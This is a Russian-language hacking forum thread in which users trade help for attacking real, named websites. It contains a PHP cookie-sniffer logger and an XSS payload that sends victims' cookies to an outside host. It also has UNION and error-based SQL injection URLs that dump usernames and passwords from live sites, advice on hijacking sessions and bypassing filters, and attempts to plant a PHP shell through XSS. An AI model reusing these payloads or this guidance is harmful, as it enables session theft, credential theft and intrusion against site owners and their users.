нужно узнать ip украсть cookie,нашёл какой-то http://kanick.ru/sniffer/ Но к автору не могу достучаться.
загрузки на свой сервак, и перенаправь жертву PHP: <?php $f = fopen('log.txt','a'); fwrite($f,$_SERVER['QUERY_STRING'].':'.$_SERVER['REMOTE_ADDR']."\r\n");fclose($f); ?>
написал же выше, ip тоже пишется, а браузер - $_SERVER['HTTP_USER_AGENT'] вся инфа держится в суперглобальном массиве $_SERVER курите php
http://www.skintologyny.com/admin/login.php http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13+from+users%23 почему не могу войти?
Там много страниц авторизации http://www.skintologyny.com/blog/wp-login.php http://www.skintologyny.com/admin/login.php/admin/verifylogin.php
помогите плз допилить. Code: http://wylsacom.planetiphone.ru/blog.php?page=-1 or 1=1 and (select 1 and row(1,1)>(select version(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) но нехочет выводить ничего(
Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании "><script>alert('XSS')</script> всё выполняеться успешно пробую подставить снифер <script> img = new Image(); img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie; </script> Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent Подскажите что не правильно делаю?
На vB при некоторых настройках куки привязаны к ip и разумеется всегда httpOnly. Если удалось получить XSS, нужно её сразу использовать для совершения необходимых действий или найти возможность получения куков другим способом, записать юзер-агент и заходить под IP из той-же подсети. Вы определитесь, что вам собственно нужно сделать и для чего.
Вопрос по XSS Имеется site1.com. Так же есть XSS вида <script>alert()</script> (т.е нет фильтрации символов) на site2.com site1.com грузит через iframe site2.com. Можно ли получить куки пользователя сайта site1.com используя XSS site2.com ?? Спасибо
нет нельзя. политика безопасности современных браузеров жестока) А у меня такой вопрос... как происходит восстановление пароля на drupal 6? Если послать запрос на ретрив - пишется куда-нибудь токен? На сайте рега модерируемая, не глянуть, а двиг скачать пока не позволяет инет лагающий подскажите?
Можно ли как-нибудь обойти подстановку дефисов в '<?php'? Нашёл XSS, пытаюсь через неё загнать PHP код, как бы странно это не казалось. В поле с XSS пишу такое: Code: </div></html><?php //код шелла; ?> В итоге в конце страницы появляется Code: <!--?php //код шелла; ?--> Код, соотв., не выполняется. Это возможно обойти? Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме) Как раскрутить? Фильтрует union и select.
В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.
